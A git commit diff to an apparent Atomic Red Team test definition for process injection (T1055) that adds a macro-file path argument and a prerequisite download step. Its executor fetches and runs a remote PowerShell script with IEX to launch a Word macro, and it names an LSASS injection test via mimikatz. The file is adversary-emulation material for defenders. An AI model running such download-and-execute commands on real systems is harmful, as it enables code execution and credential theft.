T1055 (#2177)

* T1055 * Update input args description Co-authored-by: Toua Lor <tlor@nti.local>
2022-10-04 17:33:02 -05:00
parent 297c6a48d1
commit cf8cae7466
1 changed files with 13 additions and 1 deletions
@@ -11,6 +11,11 @@ atomic_tests:
    is required.
  supported_platforms:
  - windows
+  input_arguments:
+    txt_path:
+      description: Path to file containing VBA macro to run
+      type: Path
+      default: PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt
  dependency_executor_name: powershell
  dependencies:
  - description: |
@@ -24,11 +29,18 @@ atomic_tests:
      } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
+  - description: |
+      #{txt_path} must exist on disk at specified location
+    prereq_command: |
+      if (Test-Path #{txt_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{txt_path}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055-macrocode.txt" -OutFile "#{txt_path}"
  executor:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
-      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
+      Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"
    name: powershell
 - name: Remote Process Injection in LSASS via mimikatz
  auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83